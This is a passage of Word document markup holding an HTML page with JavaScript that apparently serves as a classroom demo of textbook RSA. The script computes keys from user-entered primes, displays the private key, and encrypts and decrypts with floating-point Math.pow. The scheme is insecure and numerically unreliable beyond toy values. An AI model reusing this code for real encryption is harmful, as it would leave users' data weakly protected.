        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;&lt;input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>value="89"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="msg"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F42FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03993203" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720519E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7DA8A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Key:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7A630" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F7946" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="publickey"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C333E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96AFEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E83891" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CEFD3A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;td&gt;Exponent:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D558C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABBF223" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="exponent"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744D765" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67081DBF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A2358" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDAC395" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;Private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Key:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DF217" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D105C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="privatekey"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B94F26" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E3859" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32649C7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D3CE9C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;td&gt;Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Text:&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA0BCA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26932B69" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>id="ciphertext"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F52B9D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36972963" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B7E79" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFDB0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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133533" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;td&gt;&lt;button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>onclick="RSA();"&gt;Apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RSA&lt;/button&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ECB733" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:right="8667"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493CF8EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:right="8574"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43261D99" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284A4256" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DFA938" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="638" w:right="6526" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">type="text/javascript"&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>function RSA() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BAA39" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gcd, p,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>q, no,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n, t, e, i, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E4798" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>gcd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(a,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(!b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>? a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gcd(b,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 xml:space="preserve">b); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD417F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="917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document.getElementById('p').value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27869694" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="917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document.getElementById('q').value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B85E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917" w:right="4340"/>
      </w:pPr>
      <w:r>
        <w:t>no</w:t>
      </w:r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document.getElementById('msg').value;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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 xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>q;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CDC76" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917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* (q -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A828A48" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFFF040" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1198" w:right="6526" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(e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2;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t;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>e++)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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if (gcd(e, t) == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0D073" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77396F5E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="8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71724DB4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240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491BDA2B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8D6D20" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="6855" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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10;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>i++)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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 1 + i * t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A045BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1478" w:right="7261" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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 x / e; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0005B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="1198"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A92B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="207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621ACF97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="84"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399AC9A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>ctt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Math.pow(no,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>e).toFixed(0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= ctt % n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236957D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03118806" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>dtt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Math.pow(ct,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>d).toFixed(0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= dtt % n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BF6B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4454C595" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById('publickey').innerHTML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n; document.getElementById('exponent').innerHTML = e; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>document.getElementById('privatekey').innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CC80A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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02D21D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>document.getElementById('ciphertext').innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ct;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43A25D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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70B8B5FB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792A431C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
